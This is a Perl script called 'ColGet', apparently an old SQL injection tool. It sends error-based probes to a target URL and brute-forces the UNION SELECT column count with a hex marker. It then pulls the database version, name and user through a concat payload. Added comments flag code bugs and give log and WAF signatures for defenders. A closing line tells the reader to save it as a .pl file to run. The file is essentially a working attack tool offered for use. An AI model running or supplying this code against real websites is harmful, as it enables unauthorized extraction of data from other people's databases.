#!/usr/bin/perl
#ColGet v1.0
#By uNk
use LWP::UserAgent;
use HTTP::Request;
# Print the usage banner and terminate the process.
# Only fixed strings are passed to system(); the 'cls'/'title' commands
# are Windows console commands, so this sub assumes cmd.exe.
sub help
{
system('cls');
system('title MySQL Column And Info Get');
print "\n\n ------------------Welcome to ColGet------------------\n";
print "[+] How to use:\n";
print "\n\n-> [-] SQLi\n";
print " !getcol ---- Column get [Works on both version of MySQL]\n";
print "Example: http://www.site.com/page.php?id=1 [ENTER] \n";
print " !getinfo ---- Get global infos [Works on both version of MySQL]\n";
print "Example: http://www.site.com/page.php?id=1+union+select+1,2,1nj3ct,3-- [ENTER] \n";
print "\n\n-> [-] Options\n";
print " !h ---- Shows commands to use/help\n";
print "\n\n-> [-] Information\n";
print " This tool is created by uNk\n";
print " Converted some parts from Python [SchemaFuzz]\n";
# Never returns to the caller.
exit();
}
# Scan @ARGV for the recognised flags and store the argument that follows
# each one in a package global (the file has no 'use strict', so these
# are implicit globals):
#   !getcol  <url>  -> $mysql_count_target
#   !getinfo <url>  -> $mysql_details_target
#   !h              -> help(), which exits
# Nothing here assigns $evasion, $proxy or $vulnfile; they are read
# elsewhere in the file but never set by argument parsing.
sub variables
{
my $i=0;
foreach (@ARGV)
{
# Indexes with $i rather than using $_; the value after a flag is taken
# from $ARGV[$i+1] without checking that it exists.
if ($ARGV[$i] eq "!getcol"){$mysql_count_target = $ARGV[$i+1]}
if ($ARGV[$i] eq "!getinfo"){$mysql_details_target = $ARGV[$i+1]}
# '&help' without parens re-passes the current @_ (empty here).
if ($ARGV[$i] eq "!h"){&help}
$i++;
}
}
# Clear the (Windows) console, set its title and print the banner.
# If no arguments were given, point the user at the !h help flag.
sub main
{
system('cls');
system('title MySQL Column And Info Get');
print " My-\n" ;
print " SQL--\n" ;
print " V4-----\n" ;
print " V5------\n" ;
print " \n MySQL Column And Info Get \n\n";
# @ARGV in numeric context is its element count.
if (@ARGV<1){print "[+] Type this command to get help: !h\n\n" ;}
}
# Send a first error-based probe to $site and, if the response contains a
# known MySQL error string, iterate UNION SELECT requests with 1..100
# marker columns until the marker is reflected in the page.
#   $_[0] $site : base URL ending in the injectable parameter value
#   $_[1] $ev   : evasion selector ('/*', '%20', or anything else -> '--')
# Every path that produces a result calls exit(); the sub only returns
# normally if none of the 100 iterations reflects the marker.
# Defender notes: each request carries the literal "09+and+1=0+union+select+"
# and the hex marker 0x617a38387069783030713938 ("az88pix00q98"), both of
# which are stable strings to alert on in web-server logs or a WAF. The
# "vulnerable" decision relies entirely on verbose database error text being
# returned in the HTTP body; applications that do not echo DB errors cause
# this sub to take the "not vulnerable" branch and exit.
sub mysqlcount
{
my $site = $_[0];
my $ev = $_[1];
# Payload fragments appended verbatim to the URL.
my $null = "09+and+1=" ;
my $code = "0+union+select+" ;
# $add and $com are implicit globals. $add is assigned but never used in
# this sub; $com is the comment terminator chosen by the evasion mode.
if ($ev eq '/*')
{$add = "/**/" ; $com = "/*";}
elsif ($ev eq '%20')
{$add = "%20" ; $com = "%00" ;}
else
{$add = '+' ; $com ='--';}
# The comma is the comma operator, not concatenation: $injection is
# $site.$null.$code."0" and $com is evaluated in void context, so the
# first probe URL carries no comment terminator.
my $injection = $site.$null.$code."0",$com ;
# Plain LWP client: default agent string (libwww-perl/<version>), default
# timeout; an HTTP proxy is used only if the global $proxy is defined
# (nothing in this file assigns it).
my $useragent = LWP::UserAgent->new();
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
my $response = $useragent->get($injection);
my $result = $response->content;
# Vulnerability heuristic: any of these MySQL/PHP error fragments in the
# body. HTTP status is not checked, only the body text.
if( $result =~ m/You have an error in your SQL syntax/i || $result =~ m/Query failed/i || $result =~ m/SQL query failed/i || $result =~ m/mysql_fetch_/i || $result =~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
{
print "\n[!] Site is vulnerable!\n" ;
print "[+] Getting columns now... [Please wait]\n";
}
else
{
print "\n[!] Sorry, this site is not vulnerable.\n";
exit();
}
# $i, $col, $specialword, $sql, $ua, $rq and $response below are all
# implicit globals (no 'my'). Iteration 0 resets $col/$specialword to '',
# so iteration $i sends the marker followed by $i more marker columns,
# i.e. $i+1 columns in total.
for ($i = 0 ; $i < 100 ; $i ++)
{
$col.=','.$i;
$specialword.=','."0x617a38387069783030713938";
if ($i == 0)
{
$specialword = '' ;
$col = '' ;
}
# Marker column(s) appended after the same "and 1=0 union select" prefix.
$sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ;
# A new client object per iteration; same proxy handling as above.
$ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
$rq = $ua->get($sql);
$response = $rq->content;
# "az88pix00q98" is the ASCII decoding of the hex marker; its presence
# means one marker column was rendered into the page.
if($response =~ /az88pix00q98/)
{
# $i+1 columns were sent on this iteration, so bump $i to the count.
$i ++;
print "\n[+] Finished !\n" ;
print "[-] $i Column numbers\n" ;
# $col is ",1,...,<old $i>", so "0".$col lists $i column positions.
$sql=$site.$null.$code."0".$col.$com ;
print "-> ".$sql ."\n\n";
# Optional append to a results file. Global $vulnfile is not assigned
# anywhere in this file. Two-arg open with an interpolated path and a
# bareword handle, and neither open nor close is checked for failure.
if (defined($vulnfile))
{
open(vuln_file,">>$vulnfile") ;
print vuln_file "Target : $site\n";
print vuln_file "Evasion : $ev\n";
print vuln_file "Columns : $i\n";
print vuln_file "1nj3ct10n : $sql\n";
close(vuln_file);
print "[!] Saved to $vulnfile\n";
}
exit () ;
}
}
}
# Replace the literal placeholder "1nj3ct" in a user-supplied UNION SELECT
# URL with a concat() of version(), database() and user(), fetch the page
# and print whatever is reflected between the marker strings.
#   $_[0] $site : URL containing "1nj3ct" in one UNION SELECT position
#   $_[1] $ev   : evasion selector ('/*', '%20', or anything else -> '--')
# Every branch ends in exit().
# Defender notes: the request contains the literal function names
# version(), database(), user() and the hex marker 0x617a38387069783030713938
# ("az88pix00q98") four times; the output is only usable when the page
# reflects query results verbatim. Running the application's DB account
# with least privilege limits what user()/database() disclose.
sub mysqldetails
{
my $site = $_[0];
my $ev = $_[1];
# $add and $com are implicit globals; $add is never used in this sub.
if ($ev eq '/*')
{$add = "/**/" ; $com = "/*";}
elsif ($ev eq '%20')
{$add = "%20" ; $com = "%00" ;}
else
{$add = '+' ; $com ='--';}
# Marker / version / marker / database / marker / user / marker.
my $selection = "concat(0x617a38387069783030713938,version(),0x617a38387069783030713938,database(),0x617a38387069783030713938,user(),0x617a38387069783030713938)";
print "\n[+] Info started [Pl0x w8]....\n\n";
# Greedy captures split the URL around the first..last "1nj3ct" occurrence.
if ($site =~ /(.*)1nj3ct(.*)/i)
{
# $1/$2 are consumed here before the next match overwrites them.
my $newlink = $1.$selection.$2.$com;
# Proxy used only if global $proxy is defined (never set in this file).
my $ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
my $request = $ua->get($newlink);
my $content = $request->content;
# Expect three values separated by the decoded marker. Without /s the
# captures cannot span newlines.
if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
{
print "[+] DB Version : $1\n";
print "[+] DB Name : $2\n";
print "[+] DB Username : $3\n";
# Optional append to a results file. Two-arg open with an interpolated
# path and a bareword handle; open/close results are not checked.
if (defined($vulnfile))
{
open(vuln_file,">>$vulnfile") ;
print vuln_file "[+] Target : $site\n";
print vuln_file "[+] Evasion : $ev\n";
print vuln_file "[+] DB Version : $1\n";
print vuln_file "[+] DB Name : $2\n";
print vuln_file "[+] DB Username : $3\n";
close(vuln_file);
print "\n[!] Saved to $vulnfile\n";
}
exit () ;
}
else
{
# Marker not reflected (or error page): nothing more is attempted.
print "[-] Failed.\n";
exit () ;
}
}
else
{
print "[!] You may have entered the link incorrectly, please make sure it's in this format:\n http://site.com/page.php?id=1+union+select+1,2,1nj3ct,4,5--\n";
exit () ;
}
}
# Script entry: parse flags, show the banner, then dispatch on whichever
# target global was set. Both dispatch subs exit(), so at most one runs.
variables();
main();
if (defined($mysql_count_target))
{
print "[!] Column Get\n\n" ;
print "[!] Target : $mysql_count_target\n" ;
# $evasion is an implicit global that nothing in this file assigns before
# this point, so the first two branches are never taken and the default
# "--" terminator is always used.
if ($evasion eq '/*')
{
print "[-] Evasion : /**/\n" ;
}
elsif ($evasion eq '%20')
{
print "[-] Evasion : %20\n" ;
}
else
{
print "[-] Evasion : --\n" ;
# Last statement in the block, so the missing semicolon is legal.
$evasion = "--"
}
mysqlcount($mysql_count_target,$evasion);
}
if (defined($mysql_details_target))
{
print "[+] DB Info\n\n" ;
print "[-] Target : $mysql_details_target\n" ;
# Same evasion selection as above; $evasion is still unset unless the
# column branch ran (which would have exited).
if ($evasion eq '/*')
{
print "[-] Evasion : /**/\n" ;
}
elsif ($evasion eq '%20')
{
print "[-] Evasion : %20\n" ;
}
else
{
print "[!] Evasion : --\n" ;
$evasion = "--"
}
mysqldetails($mysql_details_target,$evasion);
}
Copy it, open Notepad, paste it, and save it as a .pl file.